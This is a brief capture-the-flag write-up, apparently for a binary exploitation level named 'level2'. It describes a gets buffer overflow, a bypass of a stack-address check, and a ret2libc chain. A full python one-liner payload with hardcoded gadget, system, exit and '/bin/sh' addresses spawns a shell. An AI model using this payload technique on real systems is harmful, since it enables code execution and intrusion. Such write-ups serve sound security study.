- Same as before, we can overflow the buffer with the gets call
BUT we have to bypass the stack address check

0x80484fb <p+39>        and    eax,0xb0000000
0x8048500 <p+44>        cmp    eax,0xb0000000

Before the ret2libc, we override the eip address with the address of a ret that will set $eip to the system address
0x804853e <p+106>               ret 

(python -c 'print("\x90"*80 + "\x3e\x85\x04\x08" + "\x60\xb0\xe6\xb7" + "\xe0\xeb\xe5\xb7" + "\x58\xcc\xf8\xb7")';cat) | ./level2

- Once the first the check is bypassed we can easily perform a ret2libc

'\x3e\x85\x04\x08' -> Address of a ret instruction
'\x60\xb0\xe6\xb7' -> Address of system
'\xe0\xeb\xe5\xb7' -> Address of exit to avoid segv
'\x58\xcc\xf8\xb7' -> Address of "/bin/sh" given to system

Then cat to avoid the shell to close
